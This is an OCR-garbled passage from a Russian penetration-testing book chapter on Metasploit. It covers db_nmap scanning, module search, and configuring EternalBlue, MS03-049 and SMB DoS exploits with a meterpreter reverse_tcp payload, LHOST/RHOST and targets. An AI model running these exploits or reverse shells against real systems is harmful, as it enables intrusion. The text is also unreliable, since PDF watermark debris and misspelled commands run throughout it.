Добавил:
Опубликованный материал нарушает ваши авторские права? Сообщите нам.
Вуз: Предмет: Файл:
книги хакеры / Колисниченко Д. Н. Хакинг на linux.pdf
Скачиваний:
17
Добавлен:
19.04.2024
Размер:
29.19 Mб
Скачать

 

 

 

 

hang

e

 

 

 

 

 

 

 

C

 

E

 

 

 

 

X

 

 

 

 

 

 

-

 

 

 

 

 

d

 

 

F

 

 

 

 

 

 

t

 

 

D

 

 

 

 

 

 

 

i

 

 

 

 

 

 

 

 

 

r

P

 

 

 

 

 

NOW!

o

 

 

 

 

 

 

 

 

 

 

 

 

BUY

 

 

 

 

 

 

to

 

 

 

 

 

w Click

 

 

 

 

 

m

 

 

 

 

 

 

w

 

 

 

 

 

 

 

 

 

 

w

 

 

 

 

 

 

 

o

 

 

.

 

 

 

 

 

.c

 

 

 

p

 

 

 

 

g

 

 

 

 

 

df

 

 

n

e

 

 

 

 

 

-xcha

 

 

 

 

))

))

))

))

))

))

))

 

 

 

hang

e

 

 

 

 

 

 

C

 

E

 

 

 

X

 

 

 

 

 

 

-

 

 

 

 

 

d

 

 

F

 

 

 

 

 

 

t

 

 

D

 

 

 

 

 

 

i

 

 

 

 

 

 

 

 

r

P

 

 

 

 

NOW!

o

 

 

 

 

 

 

 

 

 

 

BUY

 

 

 

 

 

to

 

 

 

 

 

w Click

 

 

 

 

 

 

 

 

 

 

 

o

m

Автоматический - при автоматическом соединении используется свяw

­

 

 

 

 

 

 

w

 

 

 

 

 

 

 

 

 

.

 

 

 

 

 

.c

 

занноесоединение, если бьm обнаружен NAT; в противном случае, ис­

 

 

 

g

 

 

 

p

 

 

 

 

 

 

 

 

df

 

 

n

e

 

 

 

 

-x cha

 

 

 

 

пользуется обратная связь.

Связанный - используется связанное соединение, что особенно важ­ но, если цель находится не в зоне брандмауэра или NAT шлюза.

Обратный - использует обратную связь, что особенно важно, если система не может инициировать соединение с целями.

LHOST - определяет адрес локального хоста.

LPORT - определяет порты, которые нужно использовать для обрат­ ных связей.

RНOST - определяет адрес цели.

RPORT - определяет удаленный порт, который нужно атаковать.

Настройки цели - указывает целевую операционную систему и версию.

Перерыв эксплойта - определяет время ожидания в течение нескольких минут.

9.6. Первый запуск Metasploit

Открой меню приложений и введи Metasploit. Далее появится команда за­ пуска фреймворка. Да, Metasploit по умолчанию установлен в Kali Linux и тебе не нужно предпринимать никаких действий по его установке.

Рис. 9.2. Как запустить консоль Metasploit в Kali Linux

 

·----------------------------------------------------------------------------------

1!11

 

 

 

 

hang

e

 

 

 

 

 

 

 

 

hang

e

 

 

 

 

 

 

 

 

C

 

E

 

 

 

 

 

C

 

E

 

 

 

 

 

X

 

 

 

 

 

 

 

X

 

 

 

 

 

 

 

-

 

 

 

 

 

d

 

-

 

 

 

 

 

d

 

 

F

 

 

 

 

 

 

 

t

 

F

 

 

 

 

 

 

 

t

 

 

D

 

 

 

 

 

 

 

 

i

 

D

 

 

 

 

 

 

 

 

i

 

 

 

 

 

 

 

 

 

 

r

 

 

 

 

 

 

 

 

 

r

P

 

 

 

 

 

NOW!

o

P

 

 

 

 

 

NOW!

o

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

BUY

 

 

 

 

 

 

BUY

 

 

 

 

 

 

to

 

 

 

 

 

 

 

 

 

to

 

 

 

 

 

 

w Click

 

 

Приm

первом запуске будет проинициализирована база данных фреймворкаw Click

 

 

 

 

 

 

m

 

 

 

 

 

 

 

 

 

 

w

 

 

 

 

 

 

 

 

 

w

 

 

 

 

 

 

 

 

 

 

 

w

 

 

 

 

 

 

 

 

o

 

w

 

 

 

 

 

 

 

 

o

 

 

.

 

 

 

 

 

 

.c

 

.

 

 

 

 

 

 

.c

 

 

 

p

 

 

 

 

(рис. 9.3). Файл конфигурации базы данных находится в /usr/share/metasploit­

 

 

 

g

 

 

 

 

 

 

 

 

 

g

 

 

 

 

p

 

 

 

 

 

 

 

 

 

 

df

 

 

n

e

 

 

 

df

 

 

n

e

 

 

 

 

 

-xcha

 

 

 

 

 

 

 

 

-x cha

 

 

 

 

 

framework/config/database.yml. На рис. 9.4 видно приглашение msf6 -

консоль готова ко вводу команд.

Рис. 9.3. Инициш изация базы данных

Рис. 9.4. Консоль zomoqa кработе

Фреймворк содержит полезную команду db_nmap, которая не только за­ пускает сканирование с помощью nmap, но и сохраняет результаты скани­

рования в базу данных фреймворка:

118--------------------------------------------------------------------------------

'

 

 

 

 

hang

e

 

 

 

 

 

 

 

 

 

 

 

hang

e

 

 

 

 

 

 

 

 

C

 

E

 

 

 

 

 

 

 

 

C

 

E

 

 

 

 

 

X

 

 

 

 

 

 

 

 

 

 

X

 

 

 

 

 

 

 

-

 

 

 

 

 

d

 

 

 

 

-

 

 

 

 

 

d

 

 

F

 

 

 

 

 

 

 

t

 

 

F

 

 

 

 

 

 

 

t

 

 

D

 

 

 

 

 

 

 

 

i

 

 

D

 

 

 

 

 

 

 

 

 

i

 

 

 

 

 

 

 

 

 

 

 

r

 

 

 

 

 

 

 

 

 

 

 

r

P

 

 

 

 

 

NOW!

 

o

 

P

 

 

 

 

 

 

NOW!

o

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

BUY

 

 

 

 

 

 

 

 

 

BUY

 

 

 

 

 

 

to

 

 

 

 

 

 

 

 

 

 

 

 

to

 

 

 

 

 

 

w Click

 

 

d.Ьm nmap <IР-адрес>

w Click

 

 

 

 

 

 

m

 

 

 

 

 

 

 

 

 

 

w

 

 

 

 

 

 

 

 

 

 

 

w

 

 

 

 

 

 

 

 

 

 

 

 

w

 

 

 

 

 

 

 

 

 

o

 

 

w

 

 

 

 

 

 

 

 

o

 

 

.

 

-xcha

 

 

.c

Nmap: StartingNmap 9.91 ( http://nmap.org) at 2020-12-

.

 

-x cha

 

 

.c

 

 

 

p

 

g

 

 

[*]

 

p

 

g

 

 

 

 

 

 

df

 

 

n

e

 

 

 

 

 

 

df

 

 

n

e

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

10 07:28 MSK

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

[*] Nmap: Nmap scan report for <IР-адрес>

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

[*]

Nmap: Host is up

(1.1s latency)

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

[*]

Nmap: Not shown:

993 closed ports

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

[*]

Nmap: PORT STATE SERVICE

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

[*]

Nmap: 22/tcp open ssh

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

[*]

Nmap: 80/tcp open http

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

[*]

Nmap: 514/tcp filtered shell

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

[*]

Nmap: 3128/tcp open squid-http

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

[*]

Nmap: 5555/tcp open freeciv

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

[*]

Nmap: 8000/tcp open http-alt

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

[*]

Nmap: 8080/tcp open http-proxy

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

[*]

Nmap: Nmap done: 1 IP address (1 host up) scanned in

 

 

 

 

 

 

 

 

 

 

 

 

41.39 seconds

Рис. 9.5. Команда db_nmap в действии

видим, nmap

-оХв nmap,

db_nmap

вания, db птар

 

 

.......- - - - - - -...- .......

- - . - - - - . - - -..- -... - -..- -.......

- - ...- - . - - ...- - - - - - .. - - - - · IJII

 

 

 

 

 

hang

e

 

 

 

 

 

 

 

 

 

hang

e

 

 

 

 

 

 

 

 

 

C

 

E

 

 

 

 

 

 

C

 

E

 

 

 

 

 

 

X

 

 

 

 

 

 

 

 

X

 

 

 

 

 

 

 

 

-

 

 

 

 

 

d

 

 

-

 

 

 

 

 

d

 

 

F

 

 

 

 

 

 

 

t

 

 

F

 

 

 

 

 

 

 

t

 

 

D

 

 

 

 

 

 

 

 

 

i

 

 

D

 

 

 

 

 

 

 

 

i

 

 

 

 

 

 

 

 

 

 

 

r

 

 

 

 

 

 

 

 

 

 

r

P

 

 

 

 

 

 

NOW!

o

 

P

 

 

 

 

 

NOW!

o

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

BUY

 

 

 

 

 

 

 

BUY

 

 

 

 

 

 

 

to

 

 

 

 

 

 

 

 

 

 

to

 

 

 

 

 

 

 

 

Click

 

 

 

в видеm

таблиц упрощает обмен результатами локально, так и со стороннимиClick

 

 

 

 

 

 

m

w

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

o

 

w

 

 

 

 

 

 

 

 

o

 

 

w

 

 

 

 

 

 

 

 

 

 

w

 

 

 

 

 

 

 

 

 

w

 

 

 

 

 

 

 

 

.c

 

w

 

 

 

 

 

 

 

.c

 

 

 

.

 

 

 

 

 

 

 

 

.

 

 

 

 

 

 

 

 

 

 

p

 

 

 

 

 

инструментами.

 

 

p

 

 

 

 

g

 

 

 

 

 

 

 

 

 

 

g

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

df

 

 

n

e

 

 

 

 

df

 

 

n

e

 

 

 

 

 

 

-xcha

 

 

 

 

 

 

 

 

 

-x cha

 

 

 

 

 

Для просмотра результатов сканирования используй команды hosts и services (старые названия db_hosts и db_services). Первая команда выводит список просканированных узлов, вторая - список найденных на этих хостах серви­

сов.

Рис. 9.6. Ко.манды hosts и services

Примечание. Посмотри на вывод nmap, приведенный ранее. Ты должен учитывать, что без опций -Т4 -A-v сканер может непра­ вильно определять назначение портов. Например:

[*]Nmap: 3128/tcp open squid-http

[*]Nmap: 5555/tcp open freeciv

[*]Nmap: 8000/tcp open http-alt

(*] Nmap: 8080/tcp open http-proxy

Порт 3128 определен как squid-http, порт 5555 - как freeciv, а порты 8000 и 8080 как http-alt и http-proxy соответственно. Если бы один из авторов этой книги не настраивал тестируемый узел (сканировать чужие узлы при напи­ сании книги - дурной тон), то можно было бы так и подумать. На самом -деле порты 3128, 8000 и 8080 обслуживает веб-сервер Apache, то есть по сути это веб-приложения, а порт 5555 - это не цивилизация, а всего лишь

Bugzilla.

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - .

 

 

 

 

hang

e

 

 

 

 

 

 

 

C

 

E

 

 

 

 

 

X

 

 

 

 

 

 

 

-

 

 

 

 

d

 

 

 

F

 

 

 

 

 

t

 

 

 

D

 

 

 

 

 

 

i

 

 

 

 

 

 

 

 

 

r

 

P

 

 

 

 

 

NOW!

o

 

 

 

 

 

 

 

 

1 1.111,1 !J. lk110.11,ю11,1111н· \ll·t.1,ploit

 

 

 

 

 

BUY

 

 

 

 

 

 

to

 

 

 

 

 

w Click

 

 

 

 

 

 

 

 

 

 

 

m

 

w

 

df-xchan9.7. Практическое использование команд

 

w

 

 

 

 

 

 

o

 

 

 

.

 

 

 

 

.c

 

 

 

 

p

 

 

 

 

g

 

 

 

 

 

 

 

 

 

 

e

 

 

 

 

 

 

 

 

 

Metasploit

 

1.111

 

 

 

 

hang

e

 

 

 

 

 

 

 

C

 

E

 

 

 

 

X

 

 

 

 

 

 

-

 

 

 

 

 

d

 

 

F

 

 

 

 

 

 

t

 

 

D

 

 

 

 

 

 

 

i

 

 

 

 

 

 

 

 

 

r

P

 

 

 

 

 

NOW!

o

111.10,1.1

 

BUY

 

 

 

 

 

 

to

 

 

 

 

 

w Click

 

 

 

 

 

m

 

 

 

 

 

 

w

 

 

 

 

 

 

 

 

 

 

w

 

 

 

 

 

 

 

o

 

 

.

 

 

 

 

 

.c

 

 

 

p

 

 

 

 

g

 

 

 

 

 

df

 

 

n

e

 

 

 

 

 

-x cha

 

 

 

 

9.7.1. Команда help_- получение справки

Начнем с команды help, которая выводит список доступных команд. Не нуж­ но забывать о ней, поскольку она напомнит тебе о командах, которые ты

позабыл:

msfб > help Core·commands

Command

Description

?

Help menu

back

Move back from the current context

banner

Display an awesome metasploit banner

cd

Change the current working directory

connect

Communicate with а host

exit

Exit the console

help

Help menu

info

Displays information about one or more module

irb

Drop into irb scripting mode

jobs

Displays and manages jobs

load

Load а framework plugin

loadpath

Searches for and loads modules from а path

quit

Exit the console

resource

Run the commands s.toredin а file

Примечание. Здесь и далее мы будем опускать часть вывода

Metasploit, поскольку его консоль может генерировать довольно длинный вывод, который публиковать в книге особо не хочется.

9.7.2. Команда use- выбор модуля для использования

Команда use позволяет выбрать для работы определенный модуль, напри­

мер:

. . . . ...- ...---.--------------------------------------------------------------------11:11

 

 

 

 

hang

e

 

 

 

 

 

 

C

 

E

 

 

 

 

X

 

 

 

 

 

 

-

 

 

 

 

d

 

 

F

 

 

 

 

 

t

 

 

D

 

 

 

 

 

 

i

 

 

 

 

 

 

 

 

r

P

 

 

 

 

 

NOW!

o

 

 

 

 

 

 

 

 

 

 

 

 

BUY

 

 

 

 

 

 

to

 

 

 

 

w Click

 

use exploit/windows/smЬ/ms

 

 

 

 

 

 

 

m

w

 

 

 

 

 

 

 

 

 

w

 

 

 

 

 

 

o

 

 

.

df-xchanuse exploit/windows/smЬ/msOЗ 049_netapi

 

 

 

 

 

.c

 

 

 

p

 

 

 

 

g

 

 

 

 

 

 

 

 

 

e

 

use exploit/windows/smЬ/ms04_007_killbill use exploit/windows/smЬ/ms04 011 lsass

Рис. 9. 7. Команда use

 

 

 

 

hang

e

 

 

 

 

 

 

 

C

 

E

 

 

 

 

X

 

 

 

 

 

 

-

 

 

 

 

 

d

 

 

F

 

 

 

 

 

 

t

 

 

D

 

 

 

 

 

 

 

i

 

 

 

 

 

 

 

 

 

r

P

 

 

 

 

 

NOW!

o

 

 

 

 

 

 

 

 

 

 

 

 

BUY

 

 

 

 

 

 

to

 

 

 

 

 

w Click

 

 

 

 

 

m

 

 

 

 

 

 

w

 

 

 

 

 

 

 

 

 

 

w

 

 

 

 

 

 

 

o

 

 

.

 

 

 

 

 

.c

 

 

 

p

 

 

 

 

g

 

 

 

 

 

df

 

 

n

e

 

 

 

 

 

-x cha

 

 

 

 

Примечание. Одна из особенностей консоли - автозавершение команд, подобно тому, которое используется в командной строке Linux. Просто начни вводить текст, а затем нажми ТаЬ и консоль или дополнит твою команду или предложит несколько вариан­ тов.

9.7.3. Команда show- показ сущностей

Команда show покажет все доступные сущности (модули, опции, цели и т.д.). Команде show нужно передать тип сущности или слово all, чтобы вывести все установленные модули. Вывод команды show а//:

msfб > show all

Encoders

 

-----------------------------------------------------------------------------------

·

 

 

 

 

 

hang

e

 

 

 

 

 

 

 

 

 

C

 

E

 

 

 

 

 

 

X

 

 

 

 

 

 

 

 

 

-

 

 

 

 

 

 

d

 

 

 

F

 

 

 

 

 

 

 

 

t

 

 

 

D

 

 

 

 

 

 

 

 

 

i

 

 

 

 

 

 

 

 

 

 

 

 

r

 

P

 

 

 

 

 

 

NOW!

o

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

BUY

 

 

 

 

 

 

 

 

to

 

 

 

 

 

 

 

w Click

 

 

 

 

 

 

m

 

 

 

 

 

 

 

 

 

w

 

 

 

 

 

 

 

 

 

 

 

 

 

w

 

 

f-xchan

 

 

o

 

Name

 

.

 

 

.c

 

 

 

p

d

 

 

 

 

 

e

 

 

 

 

 

 

 

 

 

g

 

 

 

 

cmd/generic sh generic/none mipsbe/longxor

 

 

 

 

 

 

hang

e

 

 

 

 

 

 

 

 

 

C

 

E

 

 

 

 

 

 

X

 

 

 

 

 

 

 

 

 

-

 

 

 

 

 

 

d

 

 

 

F

 

 

 

 

 

 

 

 

t

 

 

 

D

 

 

 

 

 

 

 

 

 

i

 

 

 

 

 

 

 

 

 

 

 

 

r

 

P

 

 

 

 

 

 

NOW!

o

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

BUY

 

 

 

 

 

 

 

 

to

 

 

 

 

 

 

 

w Click

 

 

 

 

 

 

m

 

 

 

 

 

 

 

 

 

w

 

 

 

 

 

 

 

 

 

 

 

Descr iption

 

w

 

 

f-x chan

 

 

o

 

 

.

 

 

.c

 

 

 

 

p

d

 

 

 

 

 

e

 

 

 

 

 

 

 

 

 

g

 

 

 

Generic Shell VariaЬle SuЬstitution Ccrтmзnd Enci:der

The "none" Encoder

XOR Encoder

Вывод очень большой и может продолжаться несколько минут. Поэтому луч­ ше всего изучать список модулей по группам. Доступны следующие группы:

encoders

nops

exploits

payloads

auxiliary

post

plugins

Также в конце вывода show а// выводится список установленных плагинов:

[*]AvailaЬle Framework plugins * nessus

 

* rssfeed

 

 

* sqlmap

 

 

* sounds

 

 

* auto add route

 

 

* request

 

 

* aggregator

 

 

* msgrpc

 

 

* msfd

 

 

* nexpose

 

 

* dЬ credcollect

 

 

* libnotify

 

 

* thread

 

 

* alias

 

 

* session tagger

 

 

* token adduser

 

 

* рсар log

 

* sample

 

. -----------------------------------------------------

-------------.

---------------1111

 

 

 

 

 

hang

e

 

 

 

 

 

 

 

 

 

 

C

 

E

 

 

 

 

 

 

 

X

 

 

 

 

 

 

 

 

 

 

-

 

 

 

 

 

 

d

 

 

 

 

F

 

 

 

 

 

 

 

 

t

 

 

 

 

D

 

 

 

 

 

 

 

 

 

i

 

 

 

 

 

 

 

 

 

 

 

 

 

r

 

P

 

 

 

 

 

 

NOW!

o

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

BUY

 

 

 

 

 

 

 

 

 

to

 

 

 

 

 

 

 

 

w Click

 

 

 

 

 

 

m

*

beholder

 

 

 

 

 

 

 

w

 

 

 

 

 

 

 

 

 

 

 

 

 

 

w

 

 

 

 

 

 

 

 

 

o

 

 

 

 

.

 

f-xchan

 

.c

 

*

socket logger

 

 

p

d

e

 

 

 

 

 

 

 

 

g

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

*

openvas

 

 

 

 

 

 

 

 

 

 

 

 

 

*

emap

 

 

 

 

 

 

 

 

 

 

 

 

 

*

wiki

 

 

 

 

 

 

 

 

 

 

 

 

 

*

event tester

 

 

 

 

 

 

 

 

 

 

 

 

 

* token hunter

 

 

 

 

 

 

 

 

 

 

 

 

 

*

ffautoregen

 

 

 

 

 

 

 

 

 

 

 

 

 

*

session notifier

 

 

 

 

 

 

 

 

 

 

 

 

 

*

l_ab

 

 

 

 

 

 

 

 

 

 

 

 

 

*

db tracker

* ips_filter

Наиболее часто ты будешь использовать команды:

show auxiliary show exploits show payloads

 

 

 

 

hang

e

 

 

 

 

 

 

 

C

 

E

 

 

 

 

X

 

 

 

 

 

 

-

 

 

 

 

 

d

 

 

F

 

 

 

 

 

 

t

 

 

D

 

 

 

 

 

 

 

i

 

 

 

 

 

 

 

 

 

r

P

 

 

 

 

 

NOW!

o

 

 

 

 

 

 

 

 

 

 

 

 

BUY

 

 

 

 

 

 

to

 

 

 

 

 

w Click

 

 

 

 

 

m

 

 

 

 

 

 

w

 

 

 

 

 

 

 

 

 

 

w

 

 

 

 

 

 

 

o

 

 

.

 

 

 

 

 

.c

 

 

 

p

 

 

 

 

g

 

 

 

 

 

df

 

 

n

e

 

 

 

 

 

-x cha

 

 

 

 

Выполнение show auxiliary, отобразит распечатку всех доступных вспомо­ гательных модулей в пределах Metasploit. Как бьmо упомянуто ранее, вспо­ могательные модули включают сканеры, модули отказа в обслуживании, fuzzers, и больше.

Команда show exploits будет для тебя самая интересная. Выполни show ex­ ploits, чтобы получить распечатку про все эксплоиты, связанные в одной ло­ гической среде.

Выполнение show payloads покажет все полезные нагрузки для всех плат­ форм, доступных в пределах Metasploit. Команда show options покажет настройки модуля, если ты выбрал конкретный модуль.

Рассмотрим небольшой пример:

msfб> use exploit/windows/smЬ/ms03_049_netapi

 

[ *] Using

configured payload windows/meterpreter/reserse_tcp

msfб> show options

 

 

 

Module options (exploit/windows/smЬ/ms0З 049_netapi):

 

Name

Current Setting

Required

Description

 

RНOSTS

 

yes

The target host (s), range...

RPORT

445

yes

The SМВ service port

(ТСР)

SМВРIРЕ

BROWSER

yes

Тhе pipe name to use

(BROWSER..

Payload options

(windows/meterpreter/reserse tcp):

 

1111

 

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

- .

 

 

 

 

 

hang

e

 

 

 

 

 

 

 

 

 

 

 

C

 

E

 

 

 

 

 

 

 

 

X

 

 

 

 

 

 

 

 

 

 

 

-

 

 

 

 

 

 

d

 

 

 

 

 

F

 

 

 

 

 

 

 

 

t

 

 

 

 

 

D

 

 

 

 

 

 

 

 

 

i

 

 

 

 

 

 

 

 

 

 

 

 

 

 

r

 

 

P

 

 

 

 

 

 

NOW!

o

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

BUY

 

 

 

 

 

 

 

 

 

 

to

 

 

 

 

 

 

 

 

 

w Click

 

 

 

 

 

 

m

Name

Current Setting

Required

 

 

 

 

 

 

 

w

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

w

 

 

f-xchan

 

 

o

 

.EXITFUNC thread

yes

 

.

 

 

.c

 

 

 

p

d

 

 

 

 

 

e

 

 

 

 

 

 

 

 

 

 

 

g

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

LНOST

192.169.84.136

yes

 

 

 

 

 

 

 

 

 

 

 

 

 

LPORT

4444

yes

 

 

 

 

 

 

 

 

 

Exploit target:

 

 

 

 

 

 

 

 

 

 

 

 

 

 

Id

Name

 

 

 

 

 

 

 

 

 

 

 

 

 

 

О

Windows ХР SP0/SPl

 

 

 

 

 

 

 

hang

e

 

 

 

 

 

 

 

 

 

 

C

 

E

 

 

 

 

 

 

 

X

 

 

 

 

 

 

 

 

 

 

-

 

 

 

 

 

 

d

 

 

 

 

F

 

 

 

 

 

 

 

 

t

 

 

 

 

D

 

 

 

 

 

 

 

 

 

i

 

 

 

 

 

 

 

 

 

 

 

 

 

r

 

 

P

 

 

 

 

 

 

NOW!

o

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

BUY

 

 

 

 

 

 

 

 

 

to

 

 

 

 

 

 

Description

 

w Click

 

 

 

 

 

 

m

 

 

 

 

 

 

 

 

 

 

w

 

 

 

 

 

 

 

 

 

 

 

 

 

 

w

 

 

 

 

 

 

 

 

 

o

 

Exit technique

(Accepted..

 

.

 

f-x chan

 

.c

 

 

 

p

d

e

 

 

 

 

 

 

 

 

 

 

g

 

 

 

Тhе listen address (an interf...

The listen p ort

show payloads,

Comp atiЫe

Payloads

 

 

#

Name

Disclosure Date

Rank Check

Description

о

generic/custom

normal No

Custom Payload

1

generic/deЬug_trap

noП!lд.l No

Generic х86 DеЬ...

Команда show targets позволяет просмотреть цели - на случай, если ты не уверен, что полезная нагрузка совместима с целевой системой:

Exploit t argets:

Id Name

ОWindows ХР SPO/SPl

Это довольно старенький эксплоит. Давай посмотрим на более новые ва­ рианты. Для этого используем команду search. Будем искать по названию

- etherna/Ыue:

msf6>s e a rc h eternalЫue Matching Modules

 

Name

Disclosure Date

Rank

Check

Description

 

auxili ary/admin/smЬ/ms17_010_cc:mrand 2017-03-14

no:rmal

 

Yes

МSl7-010...

 

auxili ary/scanner /smЬ/smЬ_ms17_010

no:rmal

 

Yes

МSl7 010...

 

exploit/wind:Jws/srЬ/ms17_010_eterцalЫue 2017-03-14

average

 

No

МSl7 010...

explo it/w indows/smЬ/ms17_010_eternalЫue _w in8

2017-03-14

average No ...

. - - -

- - - - - - - - - - -- - - - -- - -

. - - - - -- - - - - - - - - - - - - - - - - - - - - - - - - - - -

- - - - - - - - - - -

-

- -- - - -

-- - - - - --

 

 

 

 

hang

e

 

 

 

 

 

 

 

 

C

 

E

 

 

 

 

 

X

 

 

 

 

 

 

 

-

 

 

 

 

 

d

 

 

 

F

 

 

 

 

 

 

t

 

 

D

 

 

 

 

 

 

 

i

 

 

 

 

 

 

 

 

 

 

r

P

 

 

 

 

 

NOW!

o

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

'\al,11111 на I illll\

 

 

 

 

to

BUY

 

 

 

 

 

 

w Click

 

 

 

 

 

 

 

 

 

 

 

 

 

 

m

w

 

 

 

 

 

 

Попробуем использовать этот эксплоит:

 

w

 

 

 

 

 

 

 

 

o

 

 

.

 

 

 

 

 

 

.c

 

 

 

p

 

 

 

 

g

 

 

 

 

 

df

 

 

n

e

 

 

 

 

 

 

-xcha

 

 

 

 

 

back

use exploit/windows/smЬ/msl7 010 ethernalЫue show targets

Exploit target:

 

 

 

 

hang

e

 

 

 

 

 

 

 

C

 

E

 

 

 

 

X

 

 

 

 

 

 

-

 

 

 

 

 

d

 

 

F

 

 

 

 

 

 

t

 

 

D

 

 

 

 

 

 

 

i

 

 

 

 

 

 

 

 

 

r

P

 

 

 

 

 

NOW!

o

 

 

 

 

 

 

 

 

 

 

 

 

BUY

 

 

 

 

 

 

to

 

 

 

 

 

w Click

 

 

 

 

 

m

 

 

 

 

 

 

w

 

 

 

 

 

 

 

 

 

 

w

 

 

 

 

 

 

 

o

 

 

.

 

 

 

 

 

.c

 

 

 

p

 

 

 

 

g

 

 

 

 

 

df

 

 

n

e

 

 

 

 

 

-x cha

 

 

 

 

Id Name

ОWindows 7 and Server 2008 R2 (х64) All Service Packs

info

msf > info dos/windows/smЬ/ms09 00l_write

Name: Microsoft SRV.SYS WriteAndX Invalid DataOffset

Version: 6890

License: Metasploit Framework License (BSD)

Provided Ьу: j.v.vallejo

use.

use dos/windows/smЬ/ms09 001 write

msf auxiliary(ms09 00l_write) > show options Module options:

Name

Current Setting

Required

Description

 

 

RHOST

 

yes

The target address

.

RPORT

445

yes

Set the SMB service port

 

....

connect

 

 

 

 

 

 

 

netcat

telnet:

 

 

'

 

 

 

 

w.ill!J---------------------------------------------------------------------------------

 

 

 

 

·

 

 

 

 

hang

e

 

 

 

 

 

 

 

 

C

 

E

 

 

 

 

 

X

 

 

 

 

 

 

 

-

 

 

 

 

 

d

 

 

 

F

 

 

 

 

 

 

t

 

 

 

D

 

 

 

 

 

 

 

i

 

 

 

 

 

 

 

 

 

 

r

 

 

P

 

 

 

 

 

NOW!

o

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

BUY

 

 

 

 

 

 

 

to

 

 

 

 

 

 

w Click

 

 

 

connectm

192.169.1.1 23

 

 

 

 

 

 

w

 

 

 

 

 

 

 

 

 

 

 

w

 

 

 

 

 

 

 

o

 

 

 

.

 

-xcha

 

.c

 

 

 

 

p

 

 

[*] Connected to 192.169.1.1:23

 

 

 

 

 

 

g

 

 

 

 

 

 

df

 

 

n

e

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

Hello

 

 

 

 

 

 

 

 

 

 

DD-WRT

v44 std (с) 2018

NewMedia-NET GmЬH

 

 

 

 

 

 

 

 

Release: 07/27/18 (SVN

revision: 20011)

 

 

 

 

 

 

 

 

DD-WRT

login:

 

 

 

 

 

hang

e

 

 

 

 

 

 

 

C

 

E

 

 

 

 

X

 

 

 

 

 

 

-

 

 

 

 

 

d

 

 

F

 

 

 

 

 

 

t

 

 

D

 

 

 

 

 

 

 

i

 

 

 

 

 

 

 

 

 

r

P

 

 

 

 

 

NOW!

o

 

 

 

 

 

 

 

 

 

 

 

 

BUY

 

 

 

 

 

 

to

 

 

 

 

 

w Click

 

 

 

 

 

m

 

 

 

 

 

 

w

 

 

 

 

 

 

 

 

 

 

w

 

 

 

 

 

 

 

o

 

 

.

 

 

 

 

 

.c

 

 

 

p

 

 

 

 

g

 

 

 

 

 

df

 

 

n

e

 

 

 

 

 

-x cha

 

 

 

 

9.7.4. Команды set и setg- установка значений переменных

Команда set позволяет установить опцию модуля. Команда setg устанавлива­ ет глобальную опцию, заданное значение будет доступно для всех модулей. Установить значение опции можно так:

set RHOST 192.169.1.1 RHOST => 192.169.1.1

msf auxiliary(ms09 00l_write) > show options Module options:

Name

Current Setting

Required

Description

 

RHOST

192.169.1.1

yes

The

target address

RPORT

445

yes

Set

the SMB

service port

.Ты можешь устанавливать глобальные переменные в пределах msfconsole. Для этого используется команда setg, как уже было упомянуто. Как только они будут установлены, они станут доступны в эксплоитах и вспомогатель­ ных модулях. Также можно сохранить эти опции для использования в сле­ дующий раз. Но бывает и другая ситуация - когда ты установил глобальную переменную и забьш об этом. Установить локальную тоже забьш, в итоге ты вызываешь эксплоит с другими опциями, а не теми, что нужно. Команда unsetg используется для сброса глобальной переменной. Имена переменных в Metasploit не зависят от регистра. Мы используем заглавные символы (например, LHOST) для наглядности, но ты можешь·этого не делать. При­ меры:

msf6 > setg LHOST 192.169.1.101 LHOST => 192.169.1.101

msf6 > setg RHOSTS 192.169.1.0/24

·················-·-··-·-·------·····--·······-···································-EI

 

 

 

 

hang

e

 

 

 

 

 

 

 

C

 

E

 

 

 

 

 

X

 

 

 

 

 

 

 

-

 

 

 

 

d

 

 

 

F

 

 

 

 

 

t

 

 

 

D

 

 

 

 

 

 

i

 

 

 

 

 

 

 

 

 

r

 

P

 

 

 

 

 

NOW!

o

 

 

 

 

 

 

 

 

 

 

 

 

 

 

BUY

 

 

 

 

 

 

 

to

 

 

 

 

 

w Click

 

 

